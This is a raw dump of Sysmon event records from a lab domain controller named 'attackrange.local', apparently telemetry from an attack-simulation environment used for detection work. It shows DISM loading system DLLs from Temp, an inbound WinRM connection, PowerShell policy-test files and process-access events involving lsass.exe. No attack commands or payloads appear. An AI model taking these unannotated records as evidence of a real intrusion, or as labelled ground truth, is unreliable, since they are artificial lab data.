11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-privateprofile-l1-1-1.dllMD5=FA8EFF9B35BE58F70CD0014DAF108819,SHA256=835F086B0884E8E1689D661657F258FA1E71439672E9F0CC0140D614DAB6FA6F,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-privateprofile-l1-1-0.dllMD5=C8490BC5ACB353CAF140CB12670883A2,SHA256=85F3FE5E802843596F466D479111658B08271E48CC1821EB17E6D299D523C95E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-namedpipe-l1-1-0.dllMD5=D8F1E545D80C2045881C7F0525558D80,SHA256=0D9C3D6A6DF364F812D370258C1B3D3F97584E9F7D36569D06746EBA1695D368,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-memory-l1-1-2.dllMD5=9F77AA276A31F36805DF003F9E66BD99,SHA256=26425008D97A2EA8B95AF52BFE47CF5DE1DE9BB3E25DF77123B85C895192D7D6,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-memory-l1-1-1.dllMD5=728A5655624D5B091E8E216BE90D9EF9,SHA256=A2B17F63065CC760FA9CF5D2950D0E13613997546C90CFA1C094CF32171D49ED,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-memory-l1-1-0.dllMD5=BA6B6729DC95AA60AF31A160E2CB4533,SHA256=AA433713D5D1DB4413E9F5D938C0C452BAE8EB1BF8CD011803464BBD893BBB08,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-localization-obsolete-l1-2-0.dllMD5=B5727AD79BEBAAB6E6AFA381A28A8E9C,SHA256=C0E101B6BCDDC28A9BA24C7796BBDAAEFC14459E402FD53053F3C23E0D84D040,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-localization-l1-2-1.dllMD5=FD9B6F1EA88B7167E6EC227A61B90888,SHA256=2FEF21096468EE5C6BFC88971AFDB4CC07F6C4669375561863B85023C15684AF,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-localization-l1-2-0.dllMD5=C8420A86D981BB6AA0D32001D234639E,SHA256=2E93EA8BB070C07C39B7F042B7D9843C4B74B3D4E69C8E33D89B0574B2D1D43D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-libraryloader-l1-1-1.dllMD5=787DCDC02E39A27A63B857FF6E819593,SHA256=91A7DEC7B636C00032D122CA04D4B8653B13E1211C54A4184F3955D2398C2E2E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-libraryloader-l1-1-0.dllMD5=AC90FCC4E819CD2EEED5D09A1FA42BAC,SHA256=2DA68FCBCE619BE5A90501F971467B7A894C6A705659346729E1E4E306EEB7D7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Core-Kernel32-Private-L1-1-1.dllMD5=E269D033D63A117DA8F3F855B90CCBFD,SHA256=41437C84BF757CC5758BF381600D0DECB00E8F8F56F11765203B7880AC4CDDD0,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Core-Kernel32-Private-L1-1-0.dllMD5=58B0B7C61F098BD1E73E9C156CB38C64,SHA256=C366B92E7048081C7B336CEAB970BAA20AFDAEE2456820AA38360D1429C27669,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-kernel32-legacy-l1-1-1.dllMD5=912D93DCBE67A1373D93BACD0174E3ED,SHA256=0B94CB7472E0777AEFC1B3208ADDE41B893B78B3223F515FB86348D3362624C3,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-kernel32-legacy-l1-1-0.dllMD5=8E788763C9CDB6E5D1A313C08F7D621E,SHA256=5604FCC803BE14AD10C7A2372FB19BC80D43AD850109A670676982A4EC961473,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-io-l1-1-1.dllMD5=DC7E345A08B64DDD90906151E1D566E9,SHA256=ABDC082DAA40FCAF14E4E554DF23CFC48533F5A2157BD540BFEC49EB8E31E403,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-io-l1-1-0.dllMD5=A4381D04E233B96B657262DE9B31594C,SHA256=17BE2709D85E6B922BDF5D357FB4CD9416234F8E6685226F5EC776E8B3B5A678,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-interlocked-l1-1-0.dllMD5=39646EB20F4366691E3EFF958C99D1D4,SHA256=262D2C2EBAFFA4276F54B05A5A1DA125CC9DCCAF76EAAD3AAF7B23D54EC33C8E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Core-Heap-Obsolete-L1-1-0.dllMD5=0C5DE8F3B6CC9B44ED0A0556A02F4867,SHA256=D08261783A1749B08F7423923B00FD77E3B44265889B1F550A64239586BC8FC7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-heap-l1-1-0.dllMD5=51EBE577149EABD170684C2668F967ED,SHA256=0091D6C33047D8EF6E0F09E049DF2CABA5EE6B4F5B1870E0A369D3BF6DB72330,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-handle-l1-1-0.dllMD5=F83CB23123F3E4885547ED29F2BD2360,SHA256=495A9EC7C50D6D72F209E1F69C9B0C292D8D32FBE79FE675128786F8E351B988,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-file-l2-1-1.dllMD5=8B79E85DB9AA6D00794E5151455951BB,SHA256=EE600140599138132439FA9FB9FA6B028A9BF2A206A856CCB1106EFF45459C13,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-file-l2-1-0.dllMD5=455C1AB890C154076E0E23A42F10B6F5,SHA256=DB95D8AA71A8E0A54852C1A83E42267C72E26F2A111AD41146096BF26825FF62,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-file-l1-2-1.dllMD5=A9808572063E5A5649EA59F8B40FC7A8,SHA256=D4FD5081924D4B544188A687BD37127E0A38AF310E77C55F6EC22896B95B3C9C,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-file-l1-2-0.dllMD5=4438E1D7952A77B7F71FF45EF821814F,SHA256=1C4FA5120E310E49C8112ACB6E594DB2F581AE4B6BA6241EEA4301E0E373959F,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-file-l1-1-0.dllMD5=FF5C179E19923B65E650B11283250D50,SHA256=CF84455BC2AADF2960F0AE4D3691BF3032F412578CB2730A27848C6B26D00225,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-fibers-l1-1-1.dllMD5=A263189D905386A2A91CD2EB39D3365D,SHA256=7392027920D102DBE4C2C15590CC471063D6B1456CAA797BB71F8973C60B47FC,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-fibers-l1-1-0.dllMD5=A1827E232474C845B7A495D1A4CA6169,SHA256=A95088251923F1233CA4F5675457D6D6B2A1601734D4B5451420298491864746,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-errorhandling-l1-1-1.dllMD5=E98BCC3FA25D6DB36D50786EF08DBADD,SHA256=7BDA00F42BE64BCC1022EC3000FE2582CDF4CC89083D868ACA9DCE982C98C52C,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-errorhandling-l1-1-0.dllMD5=14E8A42D84E459F617344438903680EE,SHA256=1FCB6E1908C13B5184373E83B3C13FCF96B55E4FBBC8AAF4D6E9DA604DB75848,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-delayload-l1-1-0.dllMD5=762D2E52FAFE433C50648FC23D7C3E76,SHA256=53238588E10FFAABA96C751D34181BA04A869A0474757E79D9FE82ABC3DC7CFE,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-debug-l1-1-1.dllMD5=1652E7B742F30832826B48E62485BFC7,SHA256=0362AFCDFB6CA89CDEE0DACEC94A5E45D6910B5337343149007DE2443050D154,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-debug-l1-1-0.dllMD5=E02F6786930435C736D71E9B6B898773,SHA256=4C0F43EAC3834878F16175B17427C0195A3213B7CDF9702447667D703AA29B54,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-datetime-l1-1-1.dllMD5=78876D83AA27E510EC3DC3355D034B92,SHA256=44A696C4626AF85EA565D651D7FAF5E21B6EB0C6EE47EE93419D8A7BAD565278,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-datetime-l1-1-0.dllMD5=CF9560A4450AC70C51866581802AE8CC,SHA256=A7A23DC37F028D38D2836CE881FCFF1FD066538588B207BBBCC3B1AB96E3AB62,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-console-l1-1-0.dllMD5=893E267BD0B91FADAC2A2BAE70FD0400,SHA256=17D17AC0383117E9A14D7687ECAA3B27AF1C71B89687A5C3E5B8761B2E64EDFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-comm-l1-1-0.dllMD5=C7EC73197892D7F63059C10D19BD5D90,SHA256=768E17ED08111FD22BAAC8FAC00C7DD87F0E57FEFCDAC58CE04B868528B2FDFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-com-l1-1-0.dllMD5=08A5A3129DCB52F3C4E51EE3C4A827E7,SHA256=3C6549832275052BCC2234CC4433D95407800ED65359F5147C4762EE0C71F712,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-base-util-l1-1-0.dllMD5=29CD6DDC6BADE9098B9A4402C6336D62,SHA256=B97C475AA8241C9B674E8C51C387AFAAA7977B036D9E2F7FAFB6CACC11D985BE,IMPHASH=00000000000000000000000000000000truetrue 354300x8000000000000000248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.556{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53831-false10.0.1.14win-dc-892.attackrange.local5986- 17141700x8000000000000000247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 11:59:55.715{266CAFBE-6439-6064-C802-00000000AD01}5052\PSHost.132616655937988506.5052.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.700{266CAFBE-6439-6064-C802-00000000AD01}5052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_pvsg4ymw.aqi.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.700{266CAFBE-6439-6064-C802-00000000AD01}5052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0cwaa5wj.exp.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:55.325{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0cwaa5wj.exp.ps12021-03-31 11:59:55.325 10341000x8000000000000000243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.293{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.372{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.372{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-643C-6064-CA02-00000000AD01}4940C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.372{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 